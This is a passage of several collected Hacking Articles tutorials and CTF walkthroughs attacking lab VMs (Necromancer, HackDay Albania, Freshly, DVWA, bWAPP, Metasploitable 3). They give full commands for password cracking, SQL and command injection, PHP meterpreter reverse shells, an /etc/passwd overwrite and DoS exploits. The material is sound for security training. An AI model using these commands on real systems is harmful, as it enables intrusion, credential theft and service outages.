And we get another directory along with our 5th flag

We open the directory with our victim’s IP.

Another webpage with a hint to see the UDP port 161(used for snmp) and a close look reveals that the word “necromancer” just before the image is actually a link. Upon clicking it we get another file to download named “necromancer”. We download and unzip it. It contains a cap file named necromancer. upon analyzing this file with wireshark, we discover that 802.11 protocol is being used. This indicates that the file is a wireless data cap file so let’s try to crack the key using aircrack-ng with rockyou.txt as our dictionary.

aircrack-ng /root/Desktop/necromancer.cap -w /usr/share/wordlists/rockyou.txt

This cracks the key as death2all. use it with port 161 i.e. snmp.

snmpwalk-c death2all -v 1 192.168.0.110

It says that the door is locked.

Let’s try to unlock it using snmpset.

snmpset -c death2allrw -v 1 192.168.0.110 iso.3.6.1.2.1.1.6.0 s Unlocked

When the string changes to “Unlocked”, we run our previous command once again

snmpwalk -c death2all -v 1 192.168.0.110

Voila!! The door unlocks and we get another flag along with a clue i.e. TCP port 22 (used for ssh) . flag7{9e5494108d10bbd5f9e7ae52239546c4} – t22. Another md5 hash that decrypts to “demonslayer”.

We try to login to port 22 assuming “demonslayer” to be the password but fail.

ssh 192.168.0.110

demonslayer

This means that “demonslayer” should be the username for ssh. To crack the password, we will use metasploit along with rockyou.txt dictionary. Open a terminal for metasploit.

Search ssh_login

Thereafter we run the following commands:

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.0.110

set username demonslayer

set pass_file /usr/share/wordlists/rockyou.txt

run

We get password as 12345678 and a shell as well.

But neither ls nor dir seems to be working on this shell.

So, we login to ssh via terminal on host using demonslayer/12345678

ssh demonslayer@192.168.0.110

12345678

Using ls -la we discover that there lies a flag8.txt file in the directory. To read its contents we use

cat flag8.txt

We get another hint regarding udp port 777. This does not works on our pc. So let us try on the victim’s shell.

nc -u localhost 777

and hit enter twice.

So the necromancer is now trying to play a game with us. upon googling for his question “Where do the Black Robes practice magic of the Greater Path?” We get the answer. its Kelewan.

Our 8th flag is here.flag8{55a6af2ca3fee9f2fef81d20743bda2c} and another question as well that asks, “Who did Johann Faust VIII make a deal with?” Google tells us the answer to this question is Mephistopheles.

flag9{713587e17e796209d1df4c9c2c2d2966}

And we get the next flag and yet another question “Who is tricked into passing the Ninth Gate?” Google comes in handy again and tells us the answer once more. The next answer is Hedge.

And our next flag awaits us. flag10{8dc6486d2c63cafcdc6efbba2be98ee4} nothing more to be noticed here. But if I am not wrong, we did see this “small vile” thing somewhere earlier. Let’s head back by cntrl+c and try to look for it.

We type in ls -la and yes it’s there “.smallvile” about which we just discovered in the description alongwith our 10th flag. Let’s open it using cat.

cat .smallvile

Hope this opened up some gates cause we don’t see any clue here. Let’s try sudo.

sudo –l

Seems to be working. It shows us the location of our 11th flag and that the flag11.txt file is not protected by any sort of password. Let’s try to open it.

sudo /bin/cat /root/flag11.txt

Wohoo!! Mission Accomplished. The last flag has been captured.

Researcher and Author:Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. contact here.

The post Hack the Necromancer VM (CTF Challenge) appeared first on Hacking Articles.

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

You need to install bWAPP lab in your XAMPP or WAMP server, for this you can visit the link web Pentest lab setup using bwapp here.

Our task is to get meterpreter shell through os command injection-Blind attack using bWAPP

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.103:81/bWAPP/login.php. Enter user and password bee and bug respectively.

My task is to bypass all three security level in bWAPP through os command injection.

Let start!!!!

Set the security level low, from list box choose your bug select os command injection-Blind now and click on hack.

Type your IP in the text field and just after that start the burp suite in kali Linux. Don’t forget to set proxy in your browser while using the burp suite.

To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to PING button.

Look at image you will find that I have got the details.

Open the terminal in kali Linux and type the commix command.

From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command

commix –url=”http://192.168.1.101:81/bWAPP/commandi_blind.php” –data=”target=target=192.168.1.101&form=submit” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=5m82jlcacsvb2rfmn73gt3egi2″

This command will execute the commix tool in terminal which automatically perform command injection attack using url and cookie information in bWAPP.

Commix found the target seems injectable via blind injection techniques and will further ask for pseudo terminal.

Type ‘y’ to resumed the classic injection point and to pseudo terminal shell

Here we got the commix os shell but our aim is meterpreter shell for that we need to type following commands.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.1.101

commix(reverse_tcp) > set LPORT 4444

Option asks by commix to set backdoor for connection Type ‘2’ for other reverse TCP shells.

commix(reverse_tcp) > 2

Option asks by commix to set payload Type ‘7’ to use a Windows meterpreter reverse TCP shell.

commix(reverse_tcp) >7

Option asks by commix to set powershell injection attack Type ‘2’ to use TrustedSec’s Magic Unicorn.

commix(reverse_tcp) >2

Above step will geneterate a shellcode marked above in the image copy the whole shellcode “msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc” and paste in new terminal which will start multi handler by its own.

Once metasploit framework gets loaded and starts the payload handler; come back to your previous terminal and press enter. As it is mention in image.

Luckly!! We succeeded in our task we have got meterpreter shell.

Meterpreter>sysinfo

Same task we going to perform with same process but with another type of vulnerability. Set the security level low, from list box choose your bug select os command injection now and click on hack.

Type your IP in the DNS lookup field and just after that start the burp suite and set manual proxy of browser. Click on proxy tag then click to inception is on button, come back to bWAPP and now click to Lookup.

Open the terminal in kali Linux and type the commix command.

commix –url=”http://192.168.1.101:81/bWAPP/commandi.php” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=1; PHPSESSID=79egt1piglgkadfnaa6dujass7″ –data=”target=192.168.1.101&form=submit”

Type ‘y’ to resumed the classic injection point and to pseudo terminal shell

Here we got the commix os shell but our aim is meterpreter shell for that we need to type following commands.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.1.101

commix(reverse_tcp) > set LPORT 4444

Option asks by commix to set backdoor for connection Type ‘2’ for other reverse TCP shells.

commix(reverse_tcp) > 2

Option asks by commix to set payload Type ‘7’ to use a Windows meterpreter reverse TCP shell.

commix(reverse_tcp) >7

Option asks by commix to set powershell injection attack Type ‘2’ to use TrustedSec’s Magic Unicorn.

commix(reverse_tcp) >2

Once metasploit framework gets loaded and starts the payload handler come; back to your previous terminal and press enter. As it is mention in image.

Luckly!! Again we succeeded in our task we have got meterpreter shell.

Meterpreter>sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Powershell Injection Attacks using Commix and Magic Unicorn appeared first on Hacking Articles.

This was used in HackDay Albania’s 2016 CTF. It uses DHCP.

Note: VMware users may have issues with the network interface doing down by default. You are recommended to use Virtualbox.

Download the lab from: https://www.vulnhub.com/entry/hackday-albania,167/

Let’s begin. First we run netdiscover(as usual).

netdiscover

Next we run nmap

nmap -p- A 192.168.0.103

Nmap result shows that our target is running http on port no.8008. So, we fire up our browser targeting http://192.168.0.103:8008

The message in the box translates to- “if I am, I know where to go :)”

We try for some hint in the page-source and find a comment at the bottom “Ok ok, but not here :)” Next we run nikto on our target

nikto -h 192.168.0.103:8008

Upon discovering the existence of robots.txt, we open it up on our browser

http://192.168.0.103:8008/robots.txt

All but one directory give us the same result.

The directory that proves to be worth visiting is http://192.168.0.103:8008/unisxcudkqjydw/

So, we discover another useful directory. Lets head towards it

http://192.168.0.103:8008/unisxcudkqjydw/vulnbank/

Clicking on the client/ directory, we are greeted by a login page of very secure bank

Upon trying a single ‘as the username, we get an error page.

After trying multiple credentials, we finally succeed in logging in as the first user

‘ or ‘a’ = ‘a’ —

On the welcome page, we can find an option to upload a file. Let us create a php payload using msfvenom and try uploading it.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

We copy the php code and save it on a leafpad and save it in the name ra.php We try to upload the file but the webpage displays an error- “After we got hackedwe are allowing only image filesto upload such as jpg,jpeg, bmp etc…” Let’s rename our file to ra.jpg and try uploading it again.

Start the msf handler. msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Now we click on view ticket option under ra.jpg on our browser

And we have our meterpreter session. To get a proper shell and reach the tmp folder and find the os release, we fire up the following commands:

shell

python3 -c ‘import pty; pty.spawn(“/bin/bash”);’

cd /tmp

lsb_release -a

Kernel exploits do not seem to work here since gcc is not installed on our target machine. So, we decide to go the other way. We download a shell called LinEnum.sh from github on another terminal using-

git clone https://github.com/rebootuser/LinEnum.git

Thereafter we start apache service on our machine

service apache2 start

Thereafter, we copy the LinEnum.sh file to var/www/html folder of our machine and returning to our victim’s shell, we upload the file to his tmp folder

wget http://192.168.1.106/LinEnum.sh

Thereafter, change the permission of the uploaded file and run it.

chmod 777 LinEnum.sh

./LinEnum.sh

We discover that etc/passwd folder is writable.

And the encryption used by our victim’s machine is SHA512

We open the victim’s password file on the terminal itself

cat /etc/passwd

We then copy the entire contents of the file and copy it to a leafpad and name it as passwd. To know more about etc/passwd, please visit https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/ or https://www.digitalocean.com/community/tutorials/how-to-use-passwd-and-adduser-to-manage-passwords-on-a-linux-vps

Thereafter on another terminal, we generate a SHA512 encryption for a password “raj”

python -c ‘import crypt; print crypt.crypt(“raj”, “$6$saltsalt$”)’

We now copy this hash and replace it with the ‘x’ in the last line of our passwd file which we just saved in leafpad.

Next, we place this file named passwd in the var/www/html folder of our machine and upload it to the victim’s tmp folder

wget http://192.168.0.106/passwd

Now copy and replace this file with the passwd file present inside the etc folder.

cp passwd /etc/passwd

Then we try logging in with the user taviso

su taviso

raj

Next we try the root’s login

sudo -i

raj

Success. Now list the contents

here’s our flag. Read its contents using

cat flag.txt

Urime,

Tani nis raportin!

Which translates to:-

Congratulations,

Now begins the report!

Researcher and Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here.

The post Hack the Hackday Albania VM (CTF Challenge) appeared first on Hacking Articles.

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
Enumerate users, password hashes, privileges, roles, databases, tables and columns.
Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

For more details visit their official site sqlmap.org

Firstly you need to install bWAPP lab in your XAMPP or WAMP server, read full article from here now open the bWAPP in your pc and login with following credentials:

Let’s begin!!!

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.101:81/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select SQL-Injection (GET/SEARCH) now and click on hack.

Type any name of movie in the text field and just after that start the burp suite in kali Linux.

To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to submit. Use intercepted data within sqlmap commands.

Open the terminal in kali Linux and type the sqlmap command.

From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –dbs

This tool will now analysis the url for making connection from target and then use sql queries in given cookies for sql injection attack and fetch all names of database. So if you notice image given below we have caught all name of database. Choose any name for fetching more details.

I am interested in bwapp so that I could fetch all table under bwapp therefore I will type following command on terminal.

Here we have got 5 tables name which are: blog, heroes, movies, users, visitors.

Now if you want to penetrate more about table use the following command for each and every table.

I want to know columns details of blog table using above as I have got it as you can see in image given below.

This command fetches all columns of blog table. It shows there are 4 columns with their data types.

To know more about blog table now I will seek its column from inside using following command which will dump all field inside blog’s columns.

Blog table appears to be empty as all fields are left blank.

I want to know columns details of users table.

We have got all columns of users table with their data types.

Again I will seek its column from inside use the following command which will now dump all fields inside user’s columns.

Here I founds only two entries as you see sqlmap has dump only those column which I have mentioned in command not the whole table.

Repeat the whole process again for table movies.

In same way this tool has fetched all columns with their data types under movie table.

Again I want to penetrate its column so I will use same command by modifying its table name.

Wow!! Their are10 entries as if you will see this tool have again dump all data for which I had made request.

Once again repeat the whole process for table heroes.

We have 4 columns with their data types.

For more information repeat the process which will dump details under its columns.

We have got id, login, password and secret entries. Read the details from table.

Again repeat the same process for our last table which is visitors.

Table visitors are also having 4 columns with its data types.

Let’s penetrate its columns also

Cool!!! Like blog table it is also left blank. But the task is not ended here the more interesting things begins now.

We have traverse each and every table completely but more important than to fetch details of tables is to gain access of os-shell for any web server.

Above command will try to generate a backdoor; type 4 for PHP payload and type 1 for common location to use as writable directory.

Awesome!!! We got the shell.

os-shell> net users

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Database Penetration Testing using Sqlmap (Part 1) appeared first on Hacking Articles.

Here we come with a new article which will all be about a penetration testing challenge called FRESHLY. The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. It’s an easy lab… let’s get started with it and access it.

Download from here

https://www.vulnhub.com/?q=fresh&sort=date-asc&type=vm

So to start with it firstly we have to find out the IP of FRESHLY. For that type the netdiscover command in terminal of Kali. It will show each IP present in our network.

TARGET IP : 192.168.1.6

Now we have target IP so let’s scan it with aggressive scan (-A).

nmap -p- -A 192.168.1.6

This shows all open ports: 80, 8080, 443.

As we can see 80 port is open so we will open target IP in our browser to find out what’s in there as our next clue.

Next we will apply nikto command to it. Nitko command will help us to gather information like its files and all the other major stuff that we ought to know about our target. So, therefore, type:

After scanning it shows that there is a login.php page found. So open it in a browser with target IP

As we can see there is a login form popped up as a result asking for user and password. So we will capture the cookies using burpsuite. I have given the entries for user as admin and password as 123. You can enter anything you like

I take these parameters and run sqlmap to see if there’s SQLInjection vulnerability we will find it in its Database using sqlmap. And for this type:

Sqlmap –u “http://192.168.1.6/login.php” –data=”user=test&password=123&s=Submit” –risk 3 — level 3 –dbs

We have our required database right in front of us. Using sql commands fetch username and password from that database ie wordpress8080

Alright we have achieved our first step by finding out user and password for wordpress.

User = admin

Password = SuperSecretPassword

Earlier we have already found out our open ports so use one of not used ports to open in browser ie.8080

Cool…See what you have got…. Now click on this link and you are all set for further result.

Candy goodness!!!!! It’s our wordpress page. So let’s get on to other step by opening wordpress login page and entering the credentials we found out i.e.

User= admin

Password= SuperSecretPassword

Once you have logged in, make the malicious file that you got to upload in it. Generate code through msfvenom command:

Msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 –f raw

Side by side in other terminal open metasploit and run handler.

use exploit/multi/handler

uet payload php/meterpreter/reverse_tcp

uet lhost 192.168.1.6

uet lport 4444

exploit

Again going back to our generated php raw file copy the code from <?php to die().

As we want to read a file on the system, let’s put some PHP code in the theme: We go to Appearance -> themes -> 404.php and add some PHP code in order to execute it,

But we are not done yet as the exploit will run it will give you the session of meterpreter. Furthermore type, shell

Now we need to import the python file to reach the terminal and to do so type:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Now there might the kernel version that we could exploit so to check its version type;

lsb_release –a

When we reload the index page we got the /etc/shadow file in the footer: We already got the flag! No need to root the system But how did you get root shell, you might ask: ) Here’s the magic:

Account credential reuse from the WordPress admin password SuperSecretPassword allowed su – to escalate privileges

Author: Priya Singh is a enthusiast researcher and technical writer at hacking articles. contact here

The post Hack the Freshly VM (CTF Challenge) appeared first on Hacking Articles.

File upload vulnerability are a major problem with web based applications. In many web server this vulnerability depend entirely on purpose that allows an attacker to upload a file hiding malicious code inside that can then be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.

Attacker may reveal internal information of web server to other and some chances to sensitive data might be informal, by unauthorized people.

In DVWA the webpage allows user to upload an image, and the webpage go through with program coding and checks if the last characters of the file is ‘.jpg’ or ‘.jpeg’ or ’.png’ before allowing the image get uploaded in directory.

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, metasploit framework

DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and login with following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set Website Security Level low

Open terminal in kali linux and create php backdoor through following command

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Copy and paste the highlighted code in leafnod and save as with PHP extension as hack.php on the desktop.

Come back to your DVWA lab and click to file upload option from vulnerability menu.

Now click to browse button to browse hack.php file to upload it on web server and click on upload which will upload your file in directory of server.

After uploading a PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and past it in URL to execute it.

hackable/uploads/hack.php

Before executing this URL on browser start and run multi handler in metasploit framework using below command. While the multi handler will run execute the below URL of PHP file in browser. This’ll provide you a meterpreter session 1.

192.168.1.102:81/DVWA/hackable/uploads/hack.php

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.104

msf exploit(handler) > set lport 3333

msf exploit(handler) > run

meterpreter > sysinfo

Bypass Medium Level Security

Click on DVWA Security and set Website Security Level medium

Same process to create php backdoor.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now Save the selected code as raj.php.jpeg on desktop. Since this file will get upload in medium security which is little different from low security as this will apparently check the extension of file.

Come back to your DVWA lab and click to file upload option from vulnerability menu.

Again click to browse button to browse raj.php.jpeg file to upload it. Now start burp suit and make intercept on under proxy tab. Don’t forget to set manual proxy of your browser and click on upload.

Intercept tab will work to catch post method when you click to upload button. Now convert raj.php.jpeg into raj.php

Compare the change before uploading your PHP file. After altering click on forward to upload PHP file in directory.

This will show the path of uploaded file of the directory where file is successfully uploaded.

hackable/uploads/raj.php

Now repeat the whole process same as in low security to execute PHP file in URL.

192.168.1.102:81/DVWA/hackable/uploads/raj.php

This’ll provide a meterpreter session 2 when you run URL in browser.

meterpreter > sysinfo

Bypass High Level Security

Click on DVWA Security and set Website Security Level High

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now Save the selected code as shell.jpeg on desktop. Since this file will get upload in high security which is little different from low and medium security as this will apparently check the extension of file as well as piece of code also therefore type GIF98 before PHP code and save as shell.jpeg.

Repeat the process to browse shell.jpeg

Again you will get directory path of uploaded file.

This PHP file cannot directly execute on URL as it uploaded with jpeg extension. For rename this file into PHP file click to command injection option from vulnerability. Here this vulnerability let you copy and rename this shell.jpeg into PHP file. Types following in text box which will copied and rename shell.jpeg into aa.php

|copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php

When you will submit the command the PHP file get copied with new name as aa.php

Now repeat the process to execute PHP file in URL.

192.168.1.102:81/DVWA/hackable/uploads/aa.php

Wonderful!! Here we get meterpreter session 3 also.

meterpreter > sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack File upload Vulnerability in DVWA (Bypass All Security) appeared first on Hacking Articles.

Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. It is intended to be used as a target for testing exploits with Metasploit, hence to brush up our Metasploit skills.

We already know that our target is metasploitable 3 so there is no point to discover our target. So, let’s straight move upto nmap scan.

nmap –p- -sV 192.168.1.8

We can see that FTP port is open so we can exploit it and to do so we need a dictionary file through which we can successfully attack. To make a dictionary file type the following command :

cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 –w /root/Desktop/dict.txt

CeWL is a command used to make a customized wordlist using a given URL. Using the above command will make a dictionary file from the Wikipedia of metasploitable3 and might help us to find our password.

After generating the wordlist through CeWL, open Metasploit by typing msfconsole on the terminal of your Kali.

And then type:

use auxiliary/scanner/ftp/ftp_login

msf exploit (ftp_login)>set username vagrant

msf exploit (ftp_login)>set rhosts 192.168.1.8

msf exploit (ftp_login)>set pass_file /root/Desktop/pass.txt

msf exploit (ftp_login)>set stop_on_success true

msf exploit (ftp_login)> exploit

Above used exploit will give you a correct password to go with the username. Once you have got it then open the WinScp software, give the target’s IP and the port number along with the username: vagrant and password: vagrant

Then click on Login button. After logging in you can find you the files on the FTP server and you can use them to your advantage.

This is how you can use FTP port to log in to your victim’s PC. Enjoy!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post FTP Service Exploitation in Metasploitable 3 appeared first on Hacking Articles.

Elastic search is a distributed REST search engine used in companies for analytic search. And so we will learn how to exploit our victim through it. Start off by nmap.

nmap –p- -A 192.168.1.8

Nmap shows a splendid result and in the result you can see that HHTP service going on 9200 which is using elasticseatch REST. Let’s search it exploit on google.

YES! We have an exploit for that. Let’s use it to our advantage.

To use this exploit go to Metasploit and type:

use exploit/multi/elasticsearch/script_mvel_rce

msf exploit (script_mvel_rce)>set rhost 192.168.1.8

msf exploit (script_mvel_rce)>set rport 9200

msf exploit (script_mvel_rce)>exploit

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack Metasploitable 3 using Elasticsearch Exploit appeared first on Hacking Articles.

Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to know the Open ports for running services. I am using nmap command for scanning the target PC. Type the following command on terminal in kali Linux.

nmap –p- -sV 192.168.1.8

In previous article it’s about FTP Login attack read from here.

So here you can see all available open ports and their services today this article will cover SSH login attack for which we required open SSH port luckily in Metasploit3 open 22 is open for SSH service So let’s exploit it for this we need a dictionary file. To make a dictionary file type the following command:

cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 –w /root/Desktop/dict.txt

Collect the wordlist from CeWL,

Start Metasploit framework by typing msfconsole on the terminal.

This module will test ssh logins on a range of machines and report successful logins If you have loaded a database plug-in and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login)>set rhosts 192.168.1.8

msf auxiliary (ssh_login)>set port 22

msf auxiliary (ssh_login)>set username vagrant

msf auxiliary(ssh_login)>set pass_file /root/Desktop/pass.txt

msf auxiliary(ssh_login)>set stop_on_success true

msf auxiliary (ssh_login)> exploit

This’ll dump the credential as the username: vagrant and password: vagrant successful login for SSH connection moreover provides the session for victim’s shell.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Metasploitable 3 Exploitation using Brute forcing SSH appeared first on Hacking Articles.

Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to know the Open ports for running services. I am using nmap command for scanning the target PC. NMAP shown all available open ports and their services today this article will cover SMB login attack for which it requires open SMB port.

Type the following command on terminal in kali Linux.

nmap –p- -A 192.168.1.11

In previous article it’s about SSH Login attack read from here.

Luckily!!! In Metasploit3 port 445 is open for SMB service mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between server and client on a network.

Now it is necessary to create a dictionary file to exploit it. To make a dictionary file type the following command:

cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 –w /root/Desktop/pass.txt

CeWL is a customized wordlist generator that sticks to just the site you have specified and will go to a depth of 2 links and returns a list of words which can then be used for password crackers such as John the Ripper.

Start metasploit framework by typing msfconsole on terminal in kali Linux.

This module will test SMB logins on a range of machines and report successful logins. If you have loaded a database plug-in and connected to a database this module will record successful logins and hosts so you can track your access.

Type following command under msfconsole

use auxiliary/scanner/smb/smb_login

msf auxiliary (smb_login)>set rhosts 192.168.1.11

msf auxiliary (smb_login)>set rport 445

msf auxiliary (smb_login)>set smbuser vagrant

msf auxiliary (smb_login)>set pass_file /root/Desktop/pass.txt

msf auxiliary (smb_login)>set stop_on_success true

msf auxiliary (smb_login)> exploit

This exploit will start brute force attack to match the valid authentication and give green sign when founds the correct credential for SMB login.

Our attack is successful and we have got valid login vagrant: vagrant as username and password.

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

Hence using above credential this exploit will try to provide the meterperter shell.

Type following command to use this module for attack.

msf> use exploit/windows/smb/psexec

msf exploit (psexec)>set rhosts 192.168.1.11

msf exploit (psexec)>set rport 445

msf exploit (psexec)>set smbuser vagrant

msf exploit (psexec)>set smbpass vargrant

msf exploit (psexec)> exploit

Wonderful!!! Our meterpreter session 1 is opened and you have got victim shell.

meterpreter> sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack Metasploitable 3 using SMB Service Exploitation appeared first on Hacking Articles.

Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to know the Open ports for running services. Use nmap command for scanning the victim PC. Type the following command on terminal in kali Linux to use aggressive scan.

nmap -p- -A 192.168.1.14

From the result of scan we found that port 3389 is open for remote desktop service and under open port 80 http server header is configured with Microsoft IIS 7.5

As we know port 3389 is badly affected with Dos attack moreover Microsoft IIS 7.5 has Classic ASP configured (it allows serving .asp files).There is a password protected directory configured that has administrative asp scripts inside. An attacker requests the directory with: $i30:$INDEX_ALLOCATION appended to the directory name IIS/7.5 gracefully executes the ASP script without asking for proper credentials.

https://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongad

Use Nessus tool to scan the vulnerabilities of target Pc. Form vulnerabilities scanning result it shows two high vulnerabilities for exploit.

Start metasploit framework by typing msfconsole on terminal in kali Linux when metasploit get loaded type following command for Dos attack.

This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code execution. This module will try to cause a denial-of-service.

msf > use auxiliary/dos/http/ms15_034_ulonglongadd

msf auxiliary(ms15_034_ulonglongadd) >set rhosts 192.168.1.14

msf auxiliary(ms15_034_ulonglongadd) >exploit

In same way we’ll create Dos attack through RDP connection for port 3389 using another module.

This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 Connect MCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition.

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf auxiliary(ms12_020_maxchannelids) >set rhost 192.168.1.14

msf auxiliary(ms12_020_maxchannelids) >set rport 3389

msf auxiliary(ms12_020_maxchannelids) >exploit

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Perform DOS Attack on Metasploitable 3 appeared first on Hacking Articles.